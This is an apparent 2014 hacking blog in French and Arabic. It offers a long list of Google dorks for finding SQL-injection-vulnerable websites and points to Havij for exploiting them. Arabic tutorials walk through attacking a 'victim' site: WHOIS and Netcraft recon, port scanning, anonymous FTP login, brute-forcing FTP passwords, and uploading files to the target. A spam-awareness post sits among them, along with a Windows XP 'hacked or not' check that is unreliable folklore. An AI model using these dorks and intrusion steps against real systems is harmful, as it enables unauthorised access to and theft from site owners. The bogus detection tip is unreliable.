vendredi 15 août 2014

أقوى دورك فالعالم

liste Dork pour site vulnerable a l'injection SQL

Description : Tous ces Dorks servent a trouver des failles SQL sur des site. Après pour exploiter les failles il faut utilisé Havij.

 

Havij disponible ici

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:":2082/login/?user="
inurl:free.fr/index.php?id=
inurl:reservation.php?id=
inurl:promotion.php?id=
inurl:carte.php?id=
inurl:menu.php?id=
inurl:index.php?catid=
inurl:achat/index.php?id=
inurl:tarif.php?id=
inurl:search.php?id=

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

lundi 21 juillet 2014

اختراق اى موقع ليس مجانى بمعنى انه يكون اسم نطاقى 
yourname.com 
yourname.net 
yourname.org 
yourname.biz 
yourname.info 
other 
يكون من الصعب اختراقة بالنسبة لاى هكر لانه غالبا ما يستخدم DNS Server 
ونظم حماية كثيرة قد تصعب نسبة اختراقة 99% 

لكن خليك معايا فى هذا الموضوع وهيكون كل شىء سهل بذن الله 

لابد عندما تحارب شخص ان تعلم كل شىء عنه وهذا ما سنستخدمة فى هذه الخطوة 
يجب ان نعرف نظم الحماية التى يستخدمها الموقع 
ومن صاحب الموقع 
وكل شىء اولا كى نستطيع دخول ساحة المناورة 

لتقوم بذلك قم بالدخول الى هذا الموقع 
http://www.whois.net 

فى السطر الثانى من الصفحة التى ستظهر لك ستجد هذا السطر 
WHOIS Lookup 
قم بكتابة اسم الموقع بجوارها على سبيل المثال 
Victim.com 
victim = الموقع الى تعوز احضار المعلومات عنه 
ثم اضغط go 
سيقوم فى هذه الحالة باحضار معلومات عن الموقع الذى تريدة اليك وعن الحماية التى يستخدموها والشركة المستضيفة للموقع 
قم بقرائة البيانات جيدا اذا وجدت ما يكفيك من المعلومات تكون قد انتهيت من هذه الخطوة اذ لم يكن قم باحضار معلومات عن الشركة المستضيفة والذى سيعطيك عنوان موقعها ضمن البيانات قم بادخال عنوان الموقع فى نفس الموقع لتحضر معلومات اكثر 
ثم قم بالتدقيق فى نظم الحماية التى تعطيها الشركة لعملائها 

واذا لم تجد ايضا قم بالدخول الى هذا الموقع فهو يعتبر من افضل المواقع التى تعطيك معلومات عن نظم الحماية 
http://www.netcraft.com 

وبكده نكون انتهينا من الخطوه الاولى

قم باحضار عنوان الاى بى الخاص بالموقع من خلال 

اذهب الى استارتstart ومنها تشغيل runواكتب الامر command واكتب فى شاشة الدوس التى ستظهر ping www.vicitm.com حيث www.vicitim.comهو الموقع الضحية 

قم بعمل سكان على الموقع من خلال اى برامج السكانر على المواقع مثل برنامج 
site port scan , Gfi lan giard network securty scanner 
او برامج عمل السكان على الاجزة لكنها ستكون ضعيفة 

وهذه هى اهم خطوة لان من خلالها سنقوم بالبحث عن الثغرات الموجوده فى السيرفر 
غالبا ما ستجد البورت 80 و 21 و 808 
لا يمكننا الهجوم من خلال البورت رقم 21 حيث انه سيكون مشفر بكلمة سر لصالح صاحب الموقع لانه عنوان الاف تى بى الذى يقوم برفع الملفات من خلاله 

لدينا فى اكثر الحالات منفذان البورت 80 و 808 
او 80 فقط اذا كان 

اذا ظهر لك 80 فقط فما فى شىء بيتغير وتكون الخطوات تمام 
قم بتجرب الهجوم على المنافذ التى ظهرت لك مفتوحة مهما كانت من خلال برنامج 
ws-ftp 
او 
cute 
مع تغيير البورت من 21 الى 80 او المنفذ الذى ظهر اليك مفتوح فى خيارات الادفاسيد advanced الموجودة فى الشاشة الابتدائية للبرنامج 
قم بكتابة مكان host رقم الاى بى الخاص بالموقع او عنوان الموقع عن طريق الاف تى بى وغالبا ما يكون ftp.sitename.address 
sitename = اسم الموقع 
address = الامتداد .com او .net او غير ذلك 

فى المرة هذه الخطوة قم بالدخول بصفة زائر 
وذلك عن طريق وضع علامة صح امام كلمة anonymous 
وسيقوم البرنامج وضع كلمة السر الافتراضية لدخولك 
اذا تمت عملية الدخول قم بالتاكد انك ليس فى قسم الزوار وستكون ملحوظة فان قسم الزوار يكون فارغ 
اما اذا وجدت نفسك تتنقل بين ملفات الموقع فستكون بذلك قد اخترقت الموقع 

واذا وجدت نفسك فى قسم الزوار عليك ان تكمل معنا المسار 
قم بتحميل برنامج unsecure وهو افضل برامج اختراق المواقع 
لانه به مميزات هائلة وهو من افضل البرامج بل افضلها على الاطلاق 
وستجدة فى كثيير من المواقع فقط قم بالبحث فى محرك بحث جوجل 
عن هذا الاسم 
unsecure 1.2 
وستجد مئات المواقع باذن الله 
بعد ان تقوم بتحميل البرنامج 
قم بكتابة عنوان الاف تى بى الخاص بالموقع 
او الاى بى اذا قمت بالحصول عليه من خلال الطريقة التى قمت بشرحها 
قم بتحديد مكان القاموس وبالتحديد على جميع خيارات البرتا فورس 
لتشكيل هجوم ثنائى مضاعف ثم قم بعمل كونكت 
وانتظر حتى يجد الباس ورد وغالبا ما سيجدها لان نظام البرتا فورس يقوم بتخمين كلى للباس وردات 

بعد ان تاتيك الباس ورد قم بالدخول بواسطتها من خلال برنامج الاف تى بى من البورت 21 وليس 80 

واكمل البيانات وضع مكان اليوسر نيم اسم الموقع بدون دوت 
مثال اذا كان الموقع usa.com 
يكون اسم الدخول usa 

ومكان الباس ورد قم بكتابة الباس ورد التى قام البرنامج باحضارها اليك 
ART of exploitation


وهكذا تكون قد اخترقت الموقع 

اما اذا لم تنجح معك هذه الطرق التى قمت بوضعها لك ولم تستطيع اختراق الموقع فعليك ان تنسى عملية اختراق الموقع نهائيا من الافضل لانها فى هذه الحالة ستكون مستحيلة فانت قد قمت بهذه الطريقة باختراق سيرفر DNS وهو من افضل نظم الحماية من خلال البورت 80 
وقمت باستعمال برنامج unsecure 
ولم تستطيع 
وعملت scan 
وحاولت الاختراق من المنافذ التى ظهرت لك مفتوحة من خلال الاف تى بى ولم تستطيع 
فان لم تستطيع اختراق الموقع عليك بنسيان هذا الموقع فورا

jeudi 27 mars 2014

Spam

بسم الله الرحمن الرحيم

كلنا أصبحنا نعرف ما هي هذه الرسائل و التي نسميها نحن باسم Spam عادة هذه الرسائل ترسل من قبل أشخاص هدفهم الاحتيال عليك أو سرقة معلومات عنك أو حتى سرقة حسابك و بهذه الطريقة هم يمارسون نوعا من أنواع الهندسة الاجتماعية ليحققوا هدفهم .  
لحظة قد تكون العديد من الرسائل الالكترونية التي تأتي الى بريدك الالكتروني لست من محتالين و لكن قد تكون إعلانات لشركات حقيقية و لكن عادة لا تكون مهتما لهذه الإعلانات بل انك تعتبرها غير مرغوبة و من هنا جاء الاسم .
تغزو هذه الرسائل بريدنا الالكتروني بكثرة و هي تشكل خطرا على معلوماتنا اذا قمنا بفتحها أو الضغط على الروابط التي بداخلها أو حتى الرد عليها لان ذلك قد يؤدي الى تبادل للرسائل بينك و بين مرسل هذه الرسالة و بالنتيجة يحتال عليك بطريقة أو بأخرى فمن الأفضل أن لا ترد عليها .
و لكن كيف نتعامل مع هذه الرسائل و هل من إجراءات يجب أن نتخذها لنحمي أنفسنا الوقوع في شباك هؤلاء الناس؟؟
نعم بكل تأكيد هنالك العديد من الطرق التي يمكنك أن تقوم بها لتحمي نفسك و لتحمي الآخرين أيضا من خطر هذه الرسائل .
أولا : يمكنك التحقق من هذه الرسالة :
و ذلك عن طريق التأكد من أن هذه الرسالة ليست رسالة احتيال (Spoofing) إن رسائل الاحتيال (Spoofing) هي الرسائل التي تصل إليك على أساس أنها مرسلة من قبل Email معين و لكنها في الحقيقة ليست من قبل هذا Email  هي من قبل شخص أخر بكل تأكيد و يمكنك التأكد من ذلك عن طريق التأكد من ال Header الخاص بالرسالة المرسلة إليك , عادة ما يمكنك مشاهدة ال Header عن طريق الضغط بالزر اليمين على الرسالة الواردة إليك و اختار الخيار الخاص بال Header للرسالة و يمكنك من خلال قراءة تلك المعلومات أن تعرف من هو مرسل الرسالة الحقيقي هل هو نفس الايميل الذي كان ظاهرا لك أم أن هنالك شخص أخر (عادة ما يكون العنوان عنوان لشركة تقدم خدمة البريد المزيف الSpoofing) و للأسف هذه الشركات و المواقع أصبحت كثيرة على شبكة الانترنت و يمكنك من خلالها إرسال رسائل باسم أي بريد الكتروني تريده .
يمكنك القراءة هنا أيضا لتعرف كيف يتم كشف معلومات مرسل الرسالة الأصلي و ذلك من خلال مقالة كتبتها سابقا :
ثانيا : تحوير العنوان :
يعني التغيير في شكل عنوان بريدك الالكتروني ؟؟ و ذلك لان هنالك الكثير من البرامج التي تعمل اليوم على جمع عناوين البريد الالكتروني من المواقع و يستخدم مثل هذه البرامج هؤلاء الناس الذين يريدون إرسال تلك الرسائل المزعجة إليك لذلك اعمل على تحوير عنوان بريدك الالكتروني ؟؟ و ذلك عن طريق و ضعة في صورة مثلا بدل كتابته حتى لا تستطيع هذه البرامج قراءة بريدك , و أيضا يمكنك كتابته بهذا الشكل :
Example at yahoo dot com
لاحظ أننا و ضعنا كلمة at بلا من الإشارة @ و وضعنا أيضا كلمة dot بدلا من النقطة .
على كل حال هو أحد الأساليب و يمكنك عمل أي طريقة تراها مناسبة
ثالثا : الإبلاغ عن هذه الرسائل :
يمكنك دائما على شبكة الانترنت بأن تبلغ عن أي مخالفة للقانون و ذلك بطرق مختلفة حسب المشكلة و حسب تلك المخالفة طبعا و لكن هنا يكون الموضوع بسيطا نوعا ما حيث أنه بعد معرفتك للعنوان الحقيقي الذي يرسل اليك تلك الرسائل المزعجة يمكنك أن تبلغ عنه ,, كيف يتم ذلك طبعا يتم عن طريق الاتصال بالشركة المزودة للخدمة البريد الالكتروني مثلا لو كانت الشركة المزودة للخدمة للشخص الذي يرسل اليك الرسائل المزعجة أو المزيفة هي hotmail.com أو yahoo.com أو غيرها قد يكون موقع عادة أي شخص يمكنه استخدام عنوان بريد يكون المزود له هو موقعه بشكل مباشر عرفنا الشركة الان كيف أعرف معلومات الاتصال مع الشركة أقول لك يمكنك الذهاب الى هذا الموقع :
و يمكنك أن تبحث على معلومات ال whois لأي موقع تريدة و سوف يعطيك في النتائج معلومات اتصال تمكنك من الاتصال بهذا الموقع و بذلك يمكنك التبليغ عن أي شخص يرسل لك مثل تلك الرسائل .

أتمنى أن تكونوا قد استفدتم من هذه المقالة و السلام عليكم و رحمة الله و بركاته .

mercredi 26 mars 2014

البحث عن المواقع المصابه بثغره SQL

في هذه التدوينة سوف اشرح لكم 


البحث عن المواقع المصابه بثغره 

SQL

وبأستخدام هذا الدورك
=INFO.PHP?ID
عندما تضع هذا الدورك في الكوكل وسوف يخرج لك نتائج عند ادخول على احد المواقع يجب عليك ان تضع بعد رابط الموقع هذه العلامه الموجوده بين القوسين ( " )
لكي تتأكد اذ كان الموقع مصاب ام لا تابع الشرح في الفيديو
في الدرس القادم انشاء الله سوف اشرح كيفيه استغلال 
هذه الثغره وكيفيه اختراق الموقع المصاب بها انشاء الله 


الشرح على موقع اليوتيوب 
 by DALI_Xhackeur

lundi 24 mars 2014

حماية جهازك


by dali_xhackeur
ﺍﻟﺴﻼﻡ ﻋﻠﻴﻜﻢ
ﻓﻘﻂ ﻟﻤﺴﺘﺨﺪﻣﻲ Windows
xp
ﻛﻴﻒ ﺗﻌﺮﻑ ﺇﺫﺍ ﻛﺎﻥ ﺟﻬﺎﺯﻙ
ﻣﺨﺘﺮﻗﺎً ﺃﻡ ﻻ ؟
ﺍﻓﺘﺢ ﻗﺎﺋﻤﺔ )Start ( ﻭﻣﻨﻬﺎ ﺍﺧﺘﺮ
ﺃﻣﺮ )Run (
ﺃﻛﺘﺐ ﺍﻟﺘﺎﻟﻲ:
system.ini
ﺛﻢ ﺍﺿﻐﻂ enter
ﺳﻮﻑ ﺗﻈﻬﺮ ﻟﻚ ﺻﻔﺤﺔ ﻣﻔﻜﺮﺓ
ﻭﺑﻬﺎ ﺍﻻﺳﻄﺮ ﺍﻟﺘﺎﻟﻴﺔ :
EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON
ﺍﺫﺍ ﻇﻬﺮ ﺭﻗﻢ 850
ﻓﻬﺬﺍ ﻳﻌﻨﻲ ﺑﺎﻥ ﺟﻬﺎﺯﻙ ﺳﻠﻴﻢ
100/100 ﻭﻟﻢ ﻳﺘﻢ ﺍﺧﺘﺮﺍﻗﻪ .
ﺃﻣﺎ ﺃﺫﺍ ﻇﻬﺮ ﻟﻚ WOA
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
ﻳﻌﻨﻲ ﺟﻬﺎﺯﻙ ﻓﻴﻪ ﻣﻠﻔﺎﺕ
ﺗﺠﺴﺲ ﻭﻳﻤﻜﻦ ﺍﺧﺘﺮﺍﻗﻪ
ﺑﺴﻬﻮﻟﺔ .

ﺍﻻﺧﺘﺮﺍﻕ ﻋﻦ ﻃﺮﻳﻖ ﺍﻟﺪﻭﺱ

ﻟﺴﻼﻡ ﻋﻠﻴﻜﻢ
ﻫﺸﺮﺡ ﻟﻜﻢ ﺍﻟﻴﻮﻡ ﺍﻻﺧﺘﺮﺍﻕ ﻋﻦ
ﻃﺮﻳﻖ ﺍﻟﺪﻭﺱ...
ﻣﻠﺤﻮﻭﻭﻭﻭﻭﻭﻇﺔ ﻫﺎﺍﺍﺍﺍﺍﺍﺍﺍﺍﺍﺍﺍﺍ ﺍﺍﻣﺔ..
ﺍﻭﻻ ﻳﺠﺐ ﺃﻥ ﻳﻜﻮﻥ ﺍﻟﻀﺤﻴﺔ ﻓﺎﺗﺢ
ﺑﻮﺭﺕ20 ,ﺍﻟﺪﻭﺱ,ﻳﻜﻮﻥ ﺍﻟﻀﺤﻴﺔ
ﺷﺎﺑﻚ,,
ﻃﺒﻌﺎ ﻣﺶ ﻫﻌﺮﻑ ﺍﻋﻤﻞ ﺍﻟﺸﺮﺡ
ﺑﺎﻟﺼﻮﺭ,,ﻓﻜﺘﺒﺘﻪ ﻟﻜﻢ
===============
===============
ﺍﻟﺨﻄﻮﺓ ﺍﻻﻭﻟﻰ:ﻟﻨﺠﺎﺡ ﺍﻹﻗﺘﺤﺎﻡ ﻳﺠﺐ
ﻭﺍﻥ ﺗﻌﺮﻑ ﺍﻝIPﺗﺒﻌﻪ ﻭﺍﻥ ﻳﻜﻮﻥ
ﻟﺪﻯ ﺍﻟﻀﺤﻴﺔ ﺍﻟﺒﻮﺭﺕ21ﻣﻔﺘﻮﺡ ﻭ ﻫﻮ
ﺍﻟﺒﻮﺭﺕ ﺍﻟﺨﺎﺹ ﺑــFTP
ﻭﻟﺘﺄﻛﺪ ﻣﻦ ﺃﻥ ﺍﻟﺒﻮﺭﺕ ﻣﻔﺘﻮﺡ ﻋﻠﻴﻚ ﺍﻥ
ﺗﺴﺘﻌﻤﻞ ﺑﺮﺍﻣﺞ ﺍﻟﺴﻜﺎﻥ ﻭ ﻫﻲ ﻛﺜﻴﺮﺓ
ﺑﻌﺪﻣﺎ ﺗﺘﺄﻛﺪ ﺍﻥ ﺍﻟﺒﻮﺭﺕ ﻣﻔﺘﻮﺡ ﻧﻨﺘﻘﻞ
ﺍﻟﻰ
ﺍﻟﺨﻄﻮﺓ ﺍﻟﺜﺎﻧﻴﺔ ﻭ ﻫﻲ:
ﺇﺿﻐﻂ ﻋﻠﻰ
Start
ﺛﻢ
Run
ﺛﻢ ﺍﻛﺘﺐ
ftp –n
ﺗﻄﻠﻊ ﻟﻚ ﻧﺎﻓﺪﺓ ﻓﻲ ﺍﻟﺪﻭﺱ ﻣﻜﺘﻮﺏ
ﻋﻠﻴﻬﺎ
FTP>
ﻟﺤﺪ ﻫﻨﺎ ﻛﻞ ﺷﻲﺀ ﺗﻤﺎﻡ
ﻭ ﺑﻌﺪﻳﻦ ﺍﻛﺘﺐ
Open
ﺛﻢ ﺇﺿﻐﻂ ﻋﻠﻰ
ﺇﺩﺧﺎﻝ
Enter
ﺗﺘﺤﺼﻞ ﻋﻠﻰ ﺍﻟﻨﺘﻴﺠﺔ ﺍﻟﺘﺎﻟﻴﺔ
FTP>
To
ﺃﻛﺘﺐ ﺟﻨﺐ
To
ﺭﻗﻢIPﺍﻟﻀﺤﻴﺔ ﺛﻢ ﺇﺿﻐﻂ ﻋﻠﻰ
ﺇﺩﺧﺎﻝ
ﻭ ﺍﻟﺤﻴﻦ ﺍﻫﻢ ﺟﺰﺀ
ﺇﺩﺍ ﺗﺤﺼﻠﺖ ﻋﻠﻰ ﻫﺬﺍ ﺍﻟﺮﺩ ﻓﻘﺪ
ﺗﺨﻄﻴﺖ ﺧﻄﻮﺓ
Connected to
assassin.com/
220 w e bsrv1 Microsoft FTP
Service (Version 4.0 ).
ﻻ ﺗﻨﺴﻰ ﺗﺸﻴﻞ ﺍﻟﻤﺴﺎﺣﺔ ﺑﻴﻦw e b
ﻋﺸﺎﻥ ﺍﺫﺍ ﻣﺎ ﺣﻄﻴﻨﺎ ﺍﻟﻤﺴﺎﺣﺎﺕ ﻓﻲ
ﺍﻟﺪﻳﻒ ﺑﻮﻳﻨﺖ ﻳﺸﻔﺮﻫﺎ ﻟﺴﻼﻣﺘﻨﺎ ﻣﻦ
ﺍﻻﻛﻮﺍﺩ ﺍﻟﺨﺒﻴﺜﺔ ﻭﻣﺎ ﺷﺎﻓﻪ ﺫﻟﻚ
ﻭ ﺍﻵﻥ ﺃﻛﺘﺐ ﺍﻟﻜﺘﺎﺑﺔ ﺍﻟﺘﺎﻟﻴﺔ
ftp>quote user ftp
ﺇﺩﺍ ﺗﺤﺼﻠﺖ ﻋﻠﻰ ﻫﺬﺍ ﺍﻟﺮﺩ ﻓﻘﺪ
ﺗﺨﻄﻴﺖ ﺧﻄﻮﺓ
331Anonymous acces allowed,
send identify (e-mail name) as
.password
ﻭﺍﻵﻥ ﺃﻛﺘﺐ ﺍﻟﻜﺘﺎﺑﺔ ﺍﻟﺘﺎﻟﻴﺔ
ftp>quote cwd ~root
ﺇﺩﺍ ﺗﺤﺼﻠﺖ ﻋﻠﻰ ﻫﺬﺍ ﺍﻟﺮﺩ ﻓﻘﺪ
ﺗﺨﻄﻴﺖ ﺧﻄﻮﺓ
530Please login with USER and
PASS
ﺛﻢ ﺃﻛﺘﺐ ﺍﻟﻜﺘﺎﺑﺔ ﺍﻟﺘﺎﻟﻴﺔ
ftp>quote pass ftp
ﺇﺩﺍ ﺗﺤﺼﻠﺖ ﻋﻠﻰ ﻫﺬﺍ ﺍﻟﺮﺩ ﻓﻘﺪ
ﺗﺨﻄﻴﺖ ﺧﻄﻮﺓ
ﻭ ﻧﺠﺤﺖ ﻓﻲ ﺍﻹﻗﺘﺤﺎﻡ ﻳﻌﻨﻲ ﺍﻻﺧﺘﺮﺍﻕ
230Anonymous user logged
.in
ﻭﺍﻧﺖ ﺍﻻﻥ ﻓﻲ ﺟﻬﺎﺯ ﺍﻟﻀﺤﻴﻪ ﻣﺎ ﻋﻠﻴﻚ
ﺍﻻﺍﻥ ﺗﻘﻮﻡ ﺑﺈﺳﺘﻌﻤﺎﻝ ﻻﻭﺍﻣﺮ ﺍﻟﻔﺘﻴﺒﻲ
ﻭ ﻃﺒﻌﺎ ﻟﻦ ﺍﻣﺮ ﻋﻠﻴﻬﺎ ﻣﺮﻭﺭ ﺍﻟﻜﺮﺍﻡ
ﻟﻜﻲ ﻻ ﺗﻘﻌﻮﺍ ﻓﻲ ﺍﻟﻤﺸﻜﻠﺔ ﺍﻟﻲ
ﻭﻗﻌﺖ ﻓﻴﻬﺎ ﻭ ﻫﻲ ﻧﺠﺎﺡ ﺍﻹﻗﺘﺤﺎﻡ ﻣﻦ
ﺩﻭﻥ ﻣﺎ ﺃﻋﺮﻑ ﻭ ﻻ ﻓﻜﺮﺓ ﻋﻠﻰ ﺍﻭﺍﻣﺮ
ﺍﻟﻔﺘﻴﺒﻲ ﻭ ﺇﺫﺍ ﺍﺭﺩﺗﻢ ﺍﻥ ﺗﻀﺤﻜﻮﺍ ﺻﺎﺭ
ﻟﻲ ﺃﻛﺜﺮ ﻣﻦ20ﺩﻗﻴﻘﺔ ﻭ ﺍﻧﺎ ﻣﺠﻤﺪ
ﺍﻹﻳﺪﻱ ﻭ ﺍﻟﻀﺤﻴﺔ ﻋﺎﻟﻘﺔ ﻣﻦ ﺩﻭﻥ ﺃﻥ
ﺃﻋﻤﻞ ﺃﻱ ﺷﻲﺀ ﻭﻋﺸﺎﻥ ﻛﺬﺍ
ﻗﻤﺖ ﻭﺟﺒﺖ ﺍﻻﻭﺍﻣﺮﻋﺸﺎﻥ ﺗﻄﺒﻘﻮﻫﺎ
ﻣﺒﺎﺷﺮﺓﺍ ﺑﻌﺪ ﻧﺠﺎﺡ ﺍﻻﺧﺘﺮﺍﻕ
Pwd
ﻟﻜﻲ ﺗﻌﺮﻑ ﻣﺎ ﻳﺤﺘﻮﻳﻪ ﺍﻟﻬﺎﺭﺩ ﺩﻳﺴﻚ
Cd
ﻹﻗﺘﺤﺎﻡ ﻣﺠﻠﺪ ﻣﺜﺎﻝ
Cd Mahmoud
ﻓﻲ ﻫﺪﺍ ﺍﻟﻤﺜﺎﻝ ﻗﻤﺖ ﺑﺈﻗﺘﺤﺎﻡ ﻣﺠﻠﺪ
ﺍﻟﻤﺴﻤﻰ ﺑﻤﺤﻤﻮﺩ
Ls
ﻟﻜﻲ ﻳﺘﻀﺢ ﻟﻚ ﻣﺤﺘﻮﻯ ﺍﻟﻤﺠﻠﺪ ﺃﻭ
ﺍﻟﻬﺎﺭﺩ ﺩﻳﺴﻚ
Get
ﻟﻜﻲ ﺗﺤﻤﻞ ﺍﻟﻰ ﺳﻄﺢ ﺍﻟﻤﻜﺘﺐ ﺑﺘﺎﻉ
ﺟﻬﺎﺯﻙ
ﻭﻋﻠﻰ ﺳﺒﻴﻞ ﺍﻟﻤﺜﺎﻝ
Mahmoud.exe
Put
Get
ﻳﻌﻨﻲ ﺍﻥ ﺗﺄﺧﺪ ﻣﻠﻒ ﻣﻦ ﺳﻄﺢ
ﺍﻟﻤﻜﺘﺐ ﺑﺘﺎﻉ ﺟﻬﺎﺯﻙ ﻭ ﺗﻀﻌﻪ ﻓﻲ
ﻓﻲ ﺟﻬﺎﺯ ﺍﻟﻀﺤﻴﺔ
ﻣﺜﺎﻝ
Elmasry.exe
Clos
ﻟﻘﻄﻊ ﺍﻹﺗﺼﺎﻝ ﻣﻊ ﺍﻟﻀﺤﻴﺔ
ﺃﺧﻮﻛﻢ: #dali_xhack